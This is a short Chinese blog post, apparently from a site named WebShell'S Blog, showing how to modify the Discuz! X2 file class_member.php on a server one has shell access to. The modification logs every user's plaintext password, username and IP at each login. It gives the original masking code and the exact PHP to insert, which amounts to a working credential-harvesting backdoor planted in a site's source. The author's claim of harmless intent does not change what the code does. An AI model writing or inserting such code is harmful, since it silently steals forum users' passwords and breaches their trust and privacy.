shell下轻松截获DZ X2明文密码
首先:第一次发帖,大牛请一笑而过
其次:这是通过简单修改DZ源文件,利用密码错误记录原理截取明文密码
呵呵,目的比较简单,不想跑那蛋疼的二次加密MD5,当然不是为了做坏事
目标文件:/source/class/class_member.php
先看错误密码记录部分,第200行左右
} else {
$password = preg_replace("/^(.{".round(strlen($_G['gp_password']) / 4)."})(.+?)(.{".round(strlen($_G['gp_password']) / 6)."})$/s", "\\1***\\3", $_G['gp_password']);
$errorlog = dhtmlspecialchars(
TIMESTAMP."\t".
($result['ucresult']['username'] ? $result['ucresult']['username'] : dstripslashes($_G['gp_username']))."\t".
$password."\t".
"Ques #".intval($_G['gp_questionid'])."\t".
$_G['clientip']);
writelog('illegallog', $errorlog);
loginfailed($_G['gp_username']);
$fmsg = $result['ucresult']['uid'] == '-3' ? (empty($_G['gp_questionid']) || $answer == '' ? 'login_question_empty' : 'login_question_invalid') : 'login_invalid';
showmessage($fmsg, '', array('loginperm' => $_G['member_loginperm']));
}
我们在用户点登陆时候就记录下明文密码1 $password = preg_replace("/^(.{".round(strlen($_G['gp_password']) / 4)."})(.+?)(.{".round(strlen($_G['gp_password']) / 6)."})$/s", "\\1***\\3", $_G['gp_password']);
去掉*代替部分的密码,要截的是明文
$password = $_G['gp_password'];
改好的简单代码如下:
if($result['status'] > 0) {
$password = $_G['gp_password'];
$errorlog = dhtmlspecialchars(
TIMESTAMP."\t".
($result['ucresult']['username'] ? $result['ucresult']['username'] : dstripslashes($_G['gp_username']))."\t".
$password."\t".
"Ques #".intval($_G['gp_questionid'])."\t".
$_G['clientip']);
writelog('illegallogs', $errorlog);
}
整段代码插入到源代码if($result['status'] > 0) 前面
明文密码会记录在/data/log/2011(月份)_illegallogs.php 里,当然,错误和正确都会记录
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1790.html